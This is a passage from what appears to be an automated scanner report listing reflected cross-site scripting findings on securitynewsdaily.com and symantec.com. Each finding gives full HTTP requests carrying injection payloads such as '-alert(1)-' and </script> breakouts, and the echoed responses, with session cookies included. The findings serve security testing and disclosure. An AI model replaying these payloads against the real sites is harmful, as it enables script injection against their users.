This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mediac889f</script>b9771edadf3/system/twittertweeter.php?via=Security_SND&related=TechNewsDaily,TopTenREVIEWS,SPACEdotcom,ipnd,LiveScience,LLMysteries,OAPlanet,North_Orion,BNDarticles,MyHealth_MHND,Newsarama&url=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftools%2F&text=Security+Tools+%26+Resources HTTP/1.1
Host: www.securitynewsdaily.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/tools/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=rdrk740li51o2pdl7k6r41odm1; __qca=P0-1506324868-1297709851878; __utmz=27158498.1297709852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27158498.1497794322.1297709852.1297709852.1297709852.1; __utmc=27158498; __utmb=27158498.1.10.1297709852; reaction_28=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:57:47 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 14 Feb 2011 18:57:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.securitynewsdaily.com/mediac889f</script>b9771edadf3/system/twittertweeter.php?via=Security_SND&related=TechNewsDaily,TopTenREVIEWS,SPACEdotcom,ipnd,LiveScience,LLMysteries,OAPlanet,North_Orion,BNDarticles,MyHealth_MHND,Newsarama&url=http%3A%2F%2Fwww.se
...[SNIP]...

2.12. http://www.securitynewsdaily.com/media/system/twittertweeter.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.securitynewsdaily.com
Path:   /media/system/twittertweeter.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b8c5</script>1745ebd10c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /media/system7b8c5</script>1745ebd10c8/twittertweeter.php?via=Security_SND&related=TechNewsDaily,TopTenREVIEWS,SPACEdotcom,ipnd,LiveScience,LLMysteries,OAPlanet,North_Orion,BNDarticles,MyHealth_MHND,Newsarama&url=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftools%2F&text=Security+Tools+%26+Resources HTTP/1.1
Host: www.securitynewsdaily.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/tools/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=rdrk740li51o2pdl7k6r41odm1; __qca=P0-1506324868-1297709851878; __utmz=27158498.1297709852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27158498.1497794322.1297709852.1297709852.1297709852.1; __utmc=27158498; __utmb=27158498.1.10.1297709852; reaction_28=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:57:52 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 14 Feb 2011 18:57:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.securitynewsdaily.com/media/system7b8c5</script>1745ebd10c8/twittertweeter.php?via=Security_SND&related=TechNewsDaily,TopTenREVIEWS,SPACEdotcom,ipnd,LiveScience,LLMysteries,OAPlanet,North_Orion,BNDarticles,MyHealth_MHND,Newsarama&url=http%3A%2F%2Fwww.securityn
...[SNIP]...

2.13. http://www.securitynewsdaily.com/media/system/twittertweeter.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.securitynewsdaily.com
Path:   /media/system/twittertweeter.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 393f0</script>57361bf9a10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /media/system/393f0</script>57361bf9a10?via=Security_SND&related=TechNewsDaily,TopTenREVIEWS,SPACEdotcom,ipnd,LiveScience,LLMysteries,OAPlanet,North_Orion,BNDarticles,MyHealth_MHND,Newsarama&url=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftools%2F&text=Security+Tools+%26+Resources HTTP/1.1
Host: www.securitynewsdaily.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/tools/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=rdrk740li51o2pdl7k6r41odm1; __qca=P0-1506324868-1297709851878; __utmz=27158498.1297709852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27158498.1497794322.1297709852.1297709852.1297709852.1; __utmc=27158498; __utmb=27158498.1.10.1297709852; reaction_28=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:57:57 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 14 Feb 2011 18:57:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.securitynewsdaily.com/media/system/393f0</script>57361bf9a10?via=Security_SND&related=TechNewsDaily,TopTenREVIEWS,SPACEdotcom,ipnd,LiveScience,LLMysteries,OAPlanet,North_Orion,BNDarticles,MyHealth_MHND,Newsarama&url=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftool
...[SNIP]...

2.14. http://www.securitynewsdaily.com/media/system/twittertweeter.php [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.securitynewsdaily.com
Path:   /media/system/twittertweeter.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1433b"a%3d"b"31b0b3ac901 was submitted in the url parameter. This input was echoed as 1433b"a="b"31b0b3ac901 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /media/system/twittertweeter.php?via=Security_SND&related=TechNewsDaily,TopTenREVIEWS,SPACEdotcom,ipnd,LiveScience,LLMysteries,OAPlanet,North_Orion,BNDarticles,MyHealth_MHND,Newsarama&url=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftools%2F1433b"a%3d"b"31b0b3ac901&text=Security+Tools+%26+Resources HTTP/1.1
Host: www.securitynewsdaily.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/tools/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=rdrk740li51o2pdl7k6r41odm1; __qca=P0-1506324868-1297709851878; __utmz=27158498.1297709852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27158498.1497794322.1297709852.1297709852.1297709852.1; __utmc=27158498; __utmb=27158498.1.10.1297709852; reaction_28=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:57:38 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 611

<html><head><meta name="robots" content="NOINDEX, NOFOLLOW"></head><body style="margin: 0px; padding: 0px;"><iframe src="http://platform.twitter.com/widgets/tweet_button.html?url=http://www.securitynewsdaily.com/tools/1433b"a="b"31b0b3ac901&via=Security_SND&text=Security%20Tools%20%26%20Resources&related=TechNewsDaily,TopTenREVIEWS,SPACEdotcom,ipnd,LiveScience,LLMysteries,OAPlanet,North_Orion,BNDarticles,MyHealth_MHND,Newsarama&count=non
...[SNIP]...

2.15. http://www.securitynewsdaily.com/templates/security_news_daily/images/favicon.ico [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.securitynewsdaily.com
Path:   /templates/security_news_daily/images/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e1ce'-alert(1)-'a0f3e0810af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/security_news_daily/images/3e1ce'-alert(1)-'a0f3e0810af HTTP/1.1
Host: www.securitynewsdaily.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=rdrk740li51o2pdl7k6r41odm1; __qca=P0-1506324868-1297709851878; __utmz=27158498.1297709852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27158498.1497794322.1297709852.1297709852.1297709852.1; __utmc=27158498; __utmb=27158498.1.10.1297709852; reaction_28=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:57:26 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 14 Feb 2011 18:57:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.securitynewsdaily.com/templates/security_news_daily/images/3e1ce'-alert(1)-'a0f3e0810af",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.16. http://www.securitynewsdaily.com/tools/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.securitynewsdaily.com
Path:   /tools/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 347ac'-alert(1)-'9f9a2e36974 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tools347ac'-alert(1)-'9f9a2e36974/ HTTP/1.1
Host: www.securitynewsdaily.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a5e04250348ef9239c1cdf4824f43ad1=rdrk740li51o2pdl7k6r41odm1; __qca=P0-1506324868-1297709851878; __utmz=27158498.1297709852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27158498.1497794322.1297709852.1297709852.1297709852.1; __utmc=27158498; __utmb=27158498.1.10.1297709852; reaction_28=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:57:40 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 14 Feb 2011 18:57:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<script type="text/javascript">
setTimeout('COMSCORE.beacon({'+
'c1:2,'+
'c2:"6035753",'+
'c3:"6035753",'+
'c4:"http://www.securitynewsdaily.com/tools347ac'-alert(1)-'9f9a2e36974/",'+
'c5:"Technology - News",'+
'c6:"",'+
'c15:""'+
'});',0);
</script>
...[SNIP]...

2.17. http://www.symantec.com/connect/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebefd'-alert(1)-'d657c70a1da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/?ebefd'-alert(1)-'d657c70a1da=1 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.2.10.1297710221; s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; s_pers=%20s_nr%3D1297710248275-New%7C1318446248275%3B%20event69%3Devent69%7C1318446248276%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasconnect%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520connect%2525253A%25252520security%2525253A%25252520blogs%2525253A%25252520updated%25252520w32.stuxnet%25252520dossier%25252520is%25252520available%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%2525252Fblogs%2525252Fupdated-w32stuxnet-dossier-available%252525231%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:06:36 +0000
Vary: Cookie
ETag: "1297710396"
Content-Type: text/html; charset=utf-8
X-Varnish: 1477191521
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3589
Date: Mon, 14 Feb 2011 19:06:36 GMT
Connection: close
Content-Length: 87859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/?ebefd'-alert(1)-'d657c70a1da=1';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.18. http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/blogs/updated-w32stuxnet-dossier-available

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9954b'-alert(1)-'3c177841ed1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/blogs9954b'-alert(1)-'3c177841ed1/updated-w32stuxnet-dossier-available HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:04:55 +0000
Vary: Cookie
ETag: "1297710295"
Content-Type: text/html; charset=utf-8
Content-Length: 33477
X-Varnish: 1761089335
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3559
Date: Mon, 14 Feb 2011 19:04:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/blogs9954b'-alert(1)-'3c177841ed1/updated-w32stuxnet-dossier-available';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.19. http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/blogs/updated-w32stuxnet-dossier-available

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab4b1'-alert(1)-'61e9254ad61 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/blogs/updated-w32stuxnet-dossier-availableab4b1'-alert(1)-'61e9254ad61 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:05:30 +0000
Vary: Cookie
ETag: "1297710330"
Content-Type: text/html; charset=utf-8
Content-Length: 33868
X-Varnish: 1761089661
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Date: Mon, 14 Feb 2011 19:05:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/blogs/updated-w32stuxnet-dossier-availableab4b1'-alert(1)-'61e9254ad61';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.20. http://www.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/blogs/updated-w32stuxnet-dossier-available

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d8c9'-alert(1)-'98076a58c58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/blogs/updated-w32stuxnet-dossier-available?2d8c9'-alert(1)-'98076a58c58=1 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:03:55 +0000
Vary: Cookie
ETag: "1297710235"
Content-Type: text/html; charset=utf-8
X-Varnish: 1761088770
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3583
Date: Mon, 14 Feb 2011 19:03:56 GMT
Connection: close
Content-Length: 73593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<script type="text/javascript">
var symaccount_target_url = 'https://www-secure.symantec.com/connect/blogs/updated-w32stuxnet-dossier-available?2d8c9'-alert(1)-'98076a58c58=1';
var symaccount_base_url = 'https://symaccount.symantec.com/';
var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1';
</script>
...[SNIP]...

2.21. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/sites/default/themes/connect2/images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a6cc'-alert(1)-'e9ce5a64ba3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /connect/sites1a6cc'-alert(1)-'e9ce5a64ba3/default/themes/connect2/images/favicon.ico HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1297710221017-New%7C1318446221017%3B%20event69%3Devent69%7C1318446221018%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.2.10.1297710221; s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Mon, 14 Feb 2011 19:04:00 +0000
Vary: Cookie
ETag: "1297710240"
Content-Type: text/html; charset=utf-8
Content-Length: 33551
X-Varnish: 1761088821
X-Varnish-Cache: MISS
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
